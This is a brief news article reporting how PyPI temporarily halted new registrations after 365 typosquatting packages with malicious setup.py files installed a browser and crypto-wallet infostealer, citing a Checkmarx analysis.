The Python repository felt compelled to intervene after packages were uploaded that executed malicious code on devices. It was also temporarily unable to create new projects.
PyPi has since returned to normal operation. However, it was not possible to register and create projects for 10 hours. Given PyPi’s popularity, that was a measure that bothered many developers. The repository is widely used within the Python community as a source for code libraries, allowing developers quick access to software code.
Because many Python developers rely on PyPi, it is an interesting target for hackers. They could abuse it to spread malicious code and gain access to the systems of large companies. Exactly what happened between March 27 and March 28, leading to the halt on registrations and projects.
Operation of malware
An analysis by security firm Checkmarx provides insight into what happened at PyPi. This week, a cybercriminal uploaded 365 packages that mimicked the names of legitimate projects. The packages contained malicious code in the setup.py file, which is executed during installation. During this process, it attempts to retrieve a second payload from a remote server. If successful, an infostealer is placed on the system, which targets data in web browsers. This can include passwords, cookies, and extension data. It also attempts to steal crypto wallets.
It is unclear how many users are affected by the attack. After 10 hours, PyPi was working again, indicating that the problem would have been fixed.
21 hours ago
